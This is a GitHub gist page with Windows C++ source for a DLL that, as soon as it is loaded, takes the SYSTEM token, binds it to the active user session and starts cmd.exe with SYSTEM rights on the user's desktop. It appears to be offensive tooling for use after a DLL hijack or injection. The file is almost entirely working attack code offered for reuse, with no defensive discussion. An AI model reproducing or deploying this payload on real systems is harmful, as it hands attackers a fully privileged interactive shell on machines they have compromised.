Created
March 22, 2024 16:59
-
-
Save 1njected/1646e83e0e4fc179b6b36b115465b4c9 to your computer and use it in GitHub Desktop.
SYSTEM shell on user desktop
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Rum as SYSTEM, spawns UI in user desktop | |
// Adjusted to work with WS2022 | |
// origin:https://gist.github.com/masthoon/6f81e466d458ff8056d76266b90d2b5e | |
#include "pch.h" | |
#include <windows.h> | |
#include <Winbase.h> | |
#include <Wtsapi32.h> | |
#include <Userenv.h> | |
#include <malloc.h> | |
#include <tchar.h> | |
#pragma comment(lib, "Wtsapi32.lib") | |
#pragma comment(lib, "Userenv.lib") | |
#define DLL_EXPORT __declspec(dllexport) | |
LPCTSTR strProcess = LPCTSTR(L"C:\\Windows\\System32\\cmd.exe"); | |
bool StartInteractiveProcess(LPTSTR cmd) { | |
LPCTSTR cmdDir; | |
STARTUPINFO si; | |
ZeroMemory(&si, sizeof(si)); | |
si.cb = sizeof(si); | |
si.lpDesktop = LPTSTR(L"winsta0\\default"); // Use the default desktop for GUIs | |
cmdDir = LPCTSTR(L"C:\\Windows\\");; // Default directory | |
PROCESS_INFORMATION pi; | |
ZeroMemory(&pi, sizeof(pi)); | |
HANDLE token; | |
DWORD sessionId = WTSGetActiveConsoleSessionId(); | |
if (sessionId == 0xffffffff) // Noone is logged-in | |
return false; | |
// This only works if the current user is SYSTEM | |
HANDLE dummy; | |
TOKEN_PRIVILEGES tp; | |
LUID luid; | |
HANDLE hPToken = NULL; | |
HANDLE hProcess = NULL; | |
DWORD dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE; | |
if (WTSQueryUserToken(sessionId, &dummy)) { | |
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | |
| TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID | |
| TOKEN_READ | TOKEN_WRITE, &hPToken)) | |
{ | |
return false; | |
} | |
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) | |
{ | |
return false; | |
} | |
tp.PrivilegeCount = 1; | |
tp.Privileges[0].Luid = luid; | |
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; | |
if (!DuplicateTokenEx(hPToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &token)) { | |
return false; | |
} | |
if (!SetTokenInformation(token, TokenSessionId, (void*)&sessionId, sizeof(DWORD))) | |
{ | |
return false; | |
} | |
if (!AdjustTokenPrivileges(token, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL)) | |
{ | |
return false; | |
} | |
LPVOID pEnv = NULL; | |
if (CreateEnvironmentBlock(&pEnv, token, TRUE)) | |
{ | |
dwCreationFlags |= CREATE_UNICODE_ENVIRONMENT; | |
} | |
else pEnv = NULL; | |
// Create process for user with desktop | |
if (!CreateProcessAsUser(token, NULL, cmd, NULL, NULL, FALSE, dwCreationFlags, pEnv, NULL, &si, &pi)) { // The "new console" is necessary. Otherwise the process can hang our main process | |
CloseHandle(token); | |
return false; | |
} | |
CloseHandle(dummy); | |
CloseHandle(token); | |
} | |
// Create process for current user | |
else if (!CreateProcess(NULL, cmd, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, cmdDir, &si, &pi)) // The "new console" is necessary. Otherwise the process can hang our main process | |
return false; | |
CloseHandle(pi.hProcess); | |
CloseHandle(pi.hThread); | |
return true; | |
} | |
bool StartProcess() { | |
BOOL b; | |
SIZE_T rawSize = (_tcslen(strProcess) + 1) * sizeof(TCHAR); | |
LPTSTR commandLine = (LPTSTR)_malloca(rawSize); // Allocate on the stack | |
memcpy(commandLine, strProcess, rawSize); | |
b = StartInteractiveProcess(commandLine); | |
_freea(commandLine); | |
return b; | |
} | |
BOOL APIENTRY DllMain( HMODULE hModule, | |
DWORD ul_reason_for_call, | |
LPVOID lpReserved | |
) | |
{ | |
switch (ul_reason_for_call) | |
{ | |
case DLL_PROCESS_ATTACH: | |
StartProcess(); | |
case DLL_THREAD_ATTACH: | |
case DLL_THREAD_DETACH: | |
case DLL_PROCESS_DETACH: | |
break; | |
} | |
return TRUE; | |
} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment